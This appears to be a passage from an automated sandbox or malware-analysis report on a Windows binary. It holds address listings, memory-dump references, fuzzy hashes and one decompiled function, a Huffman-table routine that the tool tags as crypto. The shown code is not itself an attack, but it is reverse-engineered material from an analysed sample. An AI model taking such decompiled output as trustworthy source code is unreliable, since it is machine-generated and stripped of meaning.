                                                0x004065fe
                                                0x00000000
                                                0x00000000
                                                0x00406604
                                                0x00406604
                                                0x0040660a
                                                0x0040660c
                                                0x00406631
                                                0x00406634
                                                0x0040663a
                                                0x0040663f
                                                0x00406645
                                                0x0040664b
                                                0x0040664d
                                                0x00406650
                                                0x00406659
                                                0x0040665f
                                                0x0040665f
                                                0x00406652
                                                0x00406654
                                                0x00406656
                                                0x00406656
                                                0x00406661
                                                0x00406667
                                                0x00406669
                                                0x0040666c
                                                0x0040666e
                                                0x00406674
                                                0x00406676
                                                0x00406678
                                                0x0040667a
                                                0x0040667c
                                                0x0040667f
                                                0x00406688
                                                0x0040668b
                                                0x0040668b
                                                0x00406681
                                                0x00406681
                                                0x00406684
                                                0x00406684
                                                0x0040667f
                                                0x00406676
                                                0x0040668d
                                                0x0040668f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040668f
                                                0x0040660e
                                                0x0040660e
                                                0x00406614
                                                0x0040661a
                                                0x0040661c
                                                0x00000000
                                                0x00000000
                                                0x0040661e
                                                0x0040661e
                                                0x00406620
                                                0x00406622
                                                0x0040662b
                                                0x0040662b
                                                0x00406624
                                                0x00406624
                                                0x00406627
                                                0x00406627
                                                0x0040662d
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406695
                                                0x00406695
                                                0x0040669a
                                                0x0040669c
                                                0x0040669d
                                                0x0040669e
                                                0x0040669f
                                                0x004066a5
                                                0x004066a8
                                                0x004066ab
                                                0x004066ae
                                                0x004066b0
                                                0x004066b6
                                                0x004066b6
                                                0x004066b9
                                                0x004066b9
                                                0x004066b9
                                                0x004066b9
                                                0x004066c2
                                                0x00000000
                                                0x00000000
                                                0x004066c7
                                                0x004066c7
                                                0x004066ca
                                                0x004066cd
                                                0x004066cf
                                                0x00406766
                                                0x00406766
                                                0x00406769
                                                0x0040676b
                                                0x0040676c
                                                0x0040676d
                                                0x00406770
                                                0x00000000
                                                0x00406770
                                                0x004066d5
                                                0x004066d5
                                                0x004066db
                                                0x004066dd
                                                0x00406702
                                                0x00406705
                                                0x0040670b
                                                0x00406710
                                                0x00406716
                                                0x0040671c
                                                0x0040671e
                                                0x00406721
                                                0x0040672a
                                                0x00406730
                                                0x00406730
                                                0x00406723
                                                0x00406725
                                                0x00406727
                                                0x00406727
                                                0x00406732
                                                0x00406738
                                                0x0040673a
                                                0x0040673d
                                                0x0040673f
                                                0x00406745
                                                0x00406747
                                                0x00406749
                                                0x0040674b
                                                0x0040674d
                                                0x00406750
                                                0x00406759
                                                0x0040675c
                                                0x0040675c
                                                0x00406752
                                                0x00406752
                                                0x00406755
                                                0x00406755
                                                0x00406750
                                                0x00406747
                                                0x0040675e
                                                0x00406760
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406760
                                                0x004066df
                                                0x004066df
                                                0x004066e5
                                                0x004066eb
                                                0x004066ed
                                                0x00000000
                                                0x00000000
                                                0x004066ef
                                                0x004066ef
                                                0x004066f1
                                                0x004066f3
                                                0x004066fa
                                                0x004066fa
                                                0x004066fc
                                                0x004066f5
                                                0x004066f5
                                                0x004066f7
                                                0x004066f7
                                                0x004066fe
                                                0x00406700
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406778
                                                0x00406778
                                                0x0040677b
                                                0x0040677d
                                                0x00406780
                                                0x00406783
                                                0x00406783
                                                0x00406783
                                                0x00406783
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405e31
                                                0x00405e15
                                                0x00000000
                                                0x00405e1b
                                                0x00405e1e
                                                0x00405e28
                                                0x00405e2b
                                                0x00405e2e
                                                0x00000000
                                                0x00405e2e
                                                0x00405e15
                                                0x00405e39
                                                0x00405e3c
                                                0x00405e40
                                                0x00405e4a
                                                0x00405e54
                                                0x00405e57
                                                0x00405e5d
                                                0x00405f91
                                                0x00405f93
                                                0x00405f99
                                                0x00405f9c
                                                0x00405f9f
                                                0x00000000
                                                0x00405f9f
                                                0x00405e63
                                                0x00405e63
                                                0x00405e64
                                                0x00405ebc
                                                0x00405ebc
                                                0x00405ec3
                                                0x00405f69
                                                0x00405f69
                                                0x00405f6e
                                                0x00405f71
                                                0x00405f76
                                                0x00405f79
                                                0x00405f7e
                                                0x00405f81
                                                0x00405f86
                                                0x00405f89
                                                0x00405f89
                                                0x00000000
                                                0x00405ec9
                                                0x00405ec9
                                                0x00405ec9
                                                0x00405ec9
                                                0x00405ecd
                                                0x00405ecd
                                                0x00405eef
                                                0x00405ef2
                                                0x00405ef4
                                                0x00405ef7
                                                0x00405efc
                                                0x00405ed2
                                                0x00405ed2
                                                0x00405ed7
                                                0x00405ed9
                                                0x00405edb
                                                0x00405ee0
                                                0x00405ee6
                                                0x00405eeb
                                                0x00405eed
                                                0x00405eed
                                                0x00405ee2
                                                0x00405ee2
                                                0x00405ee2
                                                0x00405ee0
                                                0x00000000
                                                0x00405efe
                                                0x00405f2b
                                                0x00405f30
                                                0x00405f32
                                                0x00405f33
                                                0x00405f35
                                                0x00405f36
                                                0x00405f36
                                                0x00405f36
                                                0x00405f5e
                                                0x00405f63
                                                0x00405f63
                                                0x00000000
                                                0x00405f63
                                                0x00405efc
                                                0x00405ec3
                                                0x00405e66
                                                0x00405e66
                                                0x00405e67
                                                0x00405eb1
                                                0x00000000
                                                0x00405eb1
                                                0x00405e69
                                                0x00405e6a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405fc6
                                                0x00405fc6
                                                0x00405fc6
                                                0x00405fc9
                                                0x00000000
                                                0x00000000
                                                0x00405fa6
                                                0x00405fa6
                                                0x00405faa
                                                0x00000000
                                                0x00000000
                                                0x00405fb0
                                                0x00405fb0
                                                0x00405fb3
                                                0x00405fb6
                                                0x00405fbb
                                                0x00405fbd
                                                0x00405fc0
                                                0x00405fc3
                                                0x00405fc3
                                                0x00405fc3
                                                0x00405fcb
                                                0x00405fcb
                                                0x00405fce
                                                0x00405fd0
                                                0x00405fd5
                                                0x00405fd8
                                                0x00405fda
                                                0x00405fdd
                                                0x00000000
                                                0x00000000
                                                0x00405fe3
                                                0x00405fe3
                                                0x00405fe5
                                                0x00000000
                                                0x00000000
                                                0x00405feb
                                                0x00405feb
                                                0x00405fef
                                                0x00000000
                                                0x00000000
                                                0x00405ff5
                                                0x00405ff5
                                                0x00405ff8
                                                0x00405ffa
                                                0x00406098
                                                0x00406098
                                                0x0040609b
                                                0x0040609d
                                                0x0040609d
                                                0x004060a0
                                                0x004060a3
                                                0x004060a5
                                                0x004060a7
                                                0x004060a9
                                                0x004060a9
                                                0x004060b2
                                                0x004060b7
                                                0x004060ba
                                                0x004060bd
                                                0x004060c0
                                                0x004060c3
                                                0x004060c3
                                                0x004060c3
                                                0x004060c6
                                                0x004060cc
                                                0x004060cc
                                                0x004060d2
                                                0x004060d2
                                                0x004060d2
                                                0x00000000
                                                0x004060c6
                                                0x00406000
                                                0x00406000
                                                0x00406006
                                                0x00406009
                                                0x0040600b
                                                0x00406036
                                                0x00406039
                                                0x0040603f
                                                0x00406044
                                                0x0040604a
                                                0x00406050
                                                0x00406052
                                                0x00406055
                                                0x0040605e
                                                0x00406064
                                                0x00406064
                                                0x00406057
                                                0x00406059
                                                0x0040605b
                                                0x0040605b
                                                0x00406066
                                                0x0040606c
                                                0x0040606f
                                                0x00406071
                                                0x00406073
                                                0x00406079
                                                0x0040607b
                                                0x0040607d
                                                0x00406080
                                                0x00406089
                                                0x00406089
                                                0x0040608b
                                                0x00406082
                                                0x00406082
                                                0x00406085
                                                0x00406085
                                                0x0040608d
                                                0x0040608d
                                                0x0040607b
                                                0x00406090
                                                0x00406092
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406092
                                                0x0040600d
                                                0x0040600d
                                                0x00406013
                                                0x00406019
                                                0x0040601b
                                                0x00000000
                                                0x00000000
                                                0x0040601d
                                                0x0040601d
                                                0x0040601f
                                                0x00406021
                                                0x00406024
                                                0x0040602b
                                                0x0040602b
                                                0x0040602d
                                                0x00406026
                                                0x00406026
                                                0x00406028
                                                0x00406028
                                                0x0040602f
                                                0x00406031
                                                0x00406034
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406138
                                                0x0040613b
                                                0x0040613e
                                                0x00406144
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040631b
                                                0x0040631b
                                                0x0040631b
                                                0x0040631e
                                                0x00406321
                                                0x00406323
                                                0x00406326
                                                0x0040632c
                                                0x00406333
                                                0x00406335
                                                0x00000000
                                                0x00000000
                                                0x00406209
                                                0x00406209
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406233
                                                0x00000000
                                                0x00000000
                                                0x00406211
                                                0x00406211
                                                0x00406215
                                                0x00000000
                                                0x00000000
                                                0x0040621b
                                                0x0040621b
                                                0x0040621e
                                                0x00406221
                                                0x00406224
                                                0x00406226
                                                0x00406228
                                                0x0040622b
                                                0x0040622e
                                                0x0040622e
                                                0x0040622e
                                                0x00406235
                                                0x00406235
                                                0x0040623d
                                                0x00406240
                                                0x00406246
                                                0x00406249
                                                0x0040624d
                                                0x00406251
                                                0x00406254
                                                0x00406257
                                                0x0040626f
                                                0x0040626f
                                                0x00406272
                                                0x00406280
                                                0x00406283
                                                0x00406274
                                                0x00406274
                                                0x00406276
                                                0x0040627d
                                                0x0040627d
                                                0x004062ac
                                                0x004062ac
                                                0x004062ac
                                                0x004062af
                                                0x004062b1
                                                0x00000000
                                                0x00000000
                                                0x0040628c
                                                0x0040628c
                                                0x00406290
                                                0x00000000
                                                0x00000000
                                                0x00406296
                                                0x00406296
                                                0x00406299
                                                0x0040629c
                                                0x0040629f
                                                0x004062a1
                                                0x004062a3
                                                0x004062a6
                                                0x004062a9
                                                0x004062a9
                                                0x004062a9
                                                0x004062b3
                                                0x004062b3
                                                0x004062b5
                                                0x004062b7
                                                0x004062c2
                                                0x004062c5
                                                0x004062c8
                                                0x004062ca
                                                0x004062cc
                                                0x004062ce
                                                0x004062d1
                                                0x004062d4
                                                0x004062d9
                                                0x004062dc
                                                0x004062df
                                                0x004062e2
                                                0x004062e9
                                                0x004062ec
                                                0x004062ee
                                                0x00000000
                                                0x00000000
                                                0x004062f4
                                                0x004062f4
                                                0x004062f8
                                                0x00406309
                                                0x00406309
                                                0x00406309
                                                0x0040630b
                                                0x0040630b
                                                0x0040630f
                                                0x0040630f
                                                0x0040630f
                                                0x00406311
                                                0x00406312
                                                0x00406315
                                                0x00406315
                                                0x00406315
                                                0x00406318
                                                0x00000000
                                                0x00406318
                                                0x004062fa
                                                0x004062fa
                                                0x004062fd
                                                0x00000000
                                                0x00000000
                                                0x00406303
                                                0x00406303
                                                0x00000000
                                                0x00406303
                                                0x00406259
                                                0x00406259
                                                0x0040625b
                                                0x0040625d
                                                0x00406260
                                                0x00406263
                                                0x00406267
                                                0x00406267
                                                0x0040633b
                                                0x0040633b
                                                0x0040633e
                                                0x00406345
                                                0x00406349
                                                0x0040634b
                                                0x0040634e
                                                0x00406351
                                                0x00406356
                                                0x00406359
                                                0x0040635b
                                                0x0040635c
                                                0x0040635f
                                                0x0040636a
                                                0x0040636d
                                                0x00406384
                                                0x00406389
                                                0x00406390
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x0040639b
                                                0x0040639b
                                                0x0040639e
                                                0x004063a0
                                                0x00000000
                                                0x004063a6
                                                0x004063a6
                                                0x004063aa
                                                0x004063b5
                                                0x004063c8
                                                0x004063cd
                                                0x004063d2
                                                0x004063d4
                                                0x00000000
                                                0x00000000
                                                0x004063da
                                                0x004063da
                                                0x004063dd
                                                0x004063df
                                                0x004063ed
                                                0x004063ed
                                                0x004063f0
                                                0x004063f0
                                                0x004063f3
                                                0x004063f6
                                                0x004063f9
                                                0x004063fc
                                                0x004063ff
                                                0x00406402
                                                0x00000000
                                                0x00406402
                                                0x004063e1
                                                0x004063e1
                                                0x004063e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004063e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406786
                                                0x00406786
                                                0x0040678c
                                                0x00406792
                                                0x00406797
                                                0x0040679d
                                                0x004067a3
                                                0x004067a5
                                                0x004067a8
                                                0x004067b1
                                                0x004067b7
                                                0x004067b7
                                                0x004067aa
                                                0x004067ac
                                                0x004067ae
                                                0x004067ae
                                                0x004067b9
                                                0x004067bb
                                                0x004067be
                                                0x004067f9
                                                0x004067f9
                                                0x00000000
                                                0x004067c0
                                                0x004067c0
                                                0x004067c0
                                                0x004067c6
                                                0x004067c9
                                                0x004067cb
                                                0x00406800
                                                0x00406802
                                                0x00000000
                                                0x00406802
                                                0x00000000
                                                0x004067cb
                                                0x00000000
                                                0x00405e0a
                                                0x004067d8
                                                0x00000000
                                                0x004067d8
                                                0x004061ec
                                                0x004061ee
                                                0x00000000
                                                0x00000000
                                                0x004061f0
                                                0x004061f0
                                                0x004061f3
                                                0x00000000
                                                0x004061f3
                                                0x00406138
                                                0x004060f9
                                                0x004067dd
                                                0x004067e0
                                                0x004067e2
                                                0x004067eb
                                                0x004067f1
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f87c7fd812bd23a44b041bc42b52fb770af610f3898ecf88972882777d09f08b
                                                • Instruction ID: e18c77a923ccc912ff38ee9e75da799f543520498237710dfa30f1c5ce12811a
                                                • Opcode Fuzzy Hash: f87c7fd812bd23a44b041bc42b52fb770af610f3898ecf88972882777d09f08b
                                                • Instruction Fuzzy Hash: 4CE16871900B09DFDB24CF58C880BAAB7F5EF44305F15852EE897AB291D338AA95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004068B0, Relevance: .3, Instructions: 300COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004068B0(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6b8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6b8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6b8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                0x004068bb
                                                0x004068c3
                                                0x004068c7
                                                0x004068c9
                                                0x004068cc
                                                0x004068ce
                                                0x004068ce
                                                0x004068d0
                                                0x004068d7
                                                0x004068d9
                                                0x004068d9
                                                0x004068df
                                                0x004068f4
                                                0x004068fc
                                                0x004068fe
                                                0x00406900
                                                0x00406903
                                                0x00406904
                                                0x00406904
                                                0x0040690a
                                                0x00000000
                                                0x00000000
                                                0x0040690c
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040690f
                                                0x00406913
                                                0x00406916
                                                0x00406918
                                                0x00406918
                                                0x0040691b
                                                0x00406921
                                                0x00406922
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406922
                                                0x00406927
                                                0x0040692a
                                                0x0040692c
                                                0x0040692c
                                                0x00406932
                                                0x00406934
                                                0x00406945
                                                0x00406938
                                                0x0040693c
                                                0x00406be1
                                                0x00000000
                                                0x00406be1
                                                0x00406942
                                                0x00406943
                                                0x00406943
                                                0x0040694b
                                                0x0040694e
                                                0x00406952
                                                0x00406954
                                                0x00406956
                                                0x00406959
                                                0x00000000
                                                0x00000000
                                                0x00406961
                                                0x00406967
                                                0x00406969
                                                0x0040696b
                                                0x0040696c
                                                0x00406981
                                                0x00406981
                                                0x00406984
                                                0x00406986
                                                0x00406986
                                                0x00406988
                                                0x0040698d
                                                0x0040698f
                                                0x00406996
                                                0x00406998
                                                0x004069a0
                                                0x004069a0
                                                0x004069a2
                                                0x004069a3
                                                0x004069b2
                                                0x004069b6
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c5
                                                0x004069c8
                                                0x004069ce
                                                0x004069d5
                                                0x004069db
                                                0x00406bd4
                                                0x00406bd4
                                                0x00406bd9
                                                0x00406be8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd9
                                                0x004069e8
                                                0x004069eb
                                                0x004069ee
                                                0x004069f1
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x00406a00
                                                0x00406a03
                                                0x00406a04
                                                0x00406a06
                                                0x00406a0c
                                                0x00406a0f
                                                0x00000000
                                                0x00000000
                                                0x00406a15
                                                0x00406a16
                                                0x00406a19
                                                0x00406a1c
                                                0x00406a1f
                                                0x00406a25
                                                0x00406a27
                                                0x00406a27
                                                0x00406a2f
                                                0x00406a33
                                                0x00406a38
                                                0x00406a5d
                                                0x00406a63
                                                0x00406a65
                                                0x00406a67
                                                0x00406a6a
                                                0x00406a73
                                                0x00000000
                                                0x00000000
                                                0x00406a3a
                                                0x00406a3a
                                                0x00406a43
                                                0x00406a47
                                                0x00000000
                                                0x00000000
                                                0x00406a58
                                                0x00406a58
                                                0x00406a5b
                                                0x00000000
                                                0x00000000
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a50
                                                0x00406a54
                                                0x00000000
                                                0x00000000
                                                0x00406a56
                                                0x00406a56
                                                0x00000000
                                                0x00406a58
                                                0x00406a7c
                                                0x00406a82
                                                0x00406a8c
                                                0x00406a8e
                                                0x00406a93
                                                0x00406a95
                                                0x00406acb
                                                0x00406a97
                                                0x00406a97
                                                0x00406a9a
                                                0x00406a9d
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406ab1
                                                0x00406abc
                                                0x00406ac3
                                                0x00406ac3
                                                0x00406acd
                                                0x00406ad0
                                                0x00406ad2
                                                0x00406ad8
                                                0x00406ad8
                                                0x00406ae1
                                                0x00406ae4
                                                0x00406ae9
                                                0x00406af8
                                                0x00406b00
                                                0x00406b05
                                                0x00406b29
                                                0x00406b31
                                                0x00406b35
                                                0x00406b3b
                                                0x00406b07
                                                0x00406b15
                                                0x00406b18
                                                0x00406b1e
                                                0x00406b1e
                                                0x00406b3f
                                                0x00406afa
                                                0x00406afa
                                                0x00406afa
                                                0x00406b50
                                                0x00406b54
                                                0x00406b60
                                                0x00406b5b
                                                0x00406b5e
                                                0x00406b5e
                                                0x00406b68
                                                0x00406b6d
                                                0x00406b75
                                                0x00406b71
                                                0x00406b73
                                                0x00406b73
                                                0x00406b7b
                                                0x00406b7d
                                                0x00406b84
                                                0x00406b8e
                                                0x00406b98
                                                0x00406bb4
                                                0x00406bb8
                                                0x004069fd
                                                0x00406a03
                                                0x00406a04
                                                0x00406a06
                                                0x00406a0c
                                                0x00406a0f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406a0f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b9a
                                                0x00406b9a
                                                0x00406b9a
                                                0x00406b9f
                                                0x00406ba8
                                                0x00406bb1
                                                0x00000000
                                                0x00406bb1
                                                0x00406bbe
                                                0x00406bbe
                                                0x00406bc1
                                                0x00406bc8
                                                0x00406bcb
                                                0x00000000
                                                0x004069ee
                                                0x0040696e
                                                0x00406970
                                                0x00406970
                                                0x00406974
                                                0x00406977
                                                0x00406978
                                                0x00406978
                                                0x00000000
                                                0x00406970
                                                0x004068e4
                                                0x004068ea
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebd65a60c0032f06b53db8cd248ad540ce2340f2c19aa7aff15973d4adb3dcb0
                                                • Instruction ID: beb3b00561468fd2f1c3efb1f10135777f0892a972df78f043b62560f053f409
                                                • Opcode Fuzzy Hash: ebd65a60c0032f06b53db8cd248ad540ce2340f2c19aa7aff15973d4adb3dcb0
                                                • Instruction Fuzzy Hash: 31C14B71A00229CBCF14DF68D4905EEB7B2FF99314F26816AD856BB380D734A952CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 023D1886, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
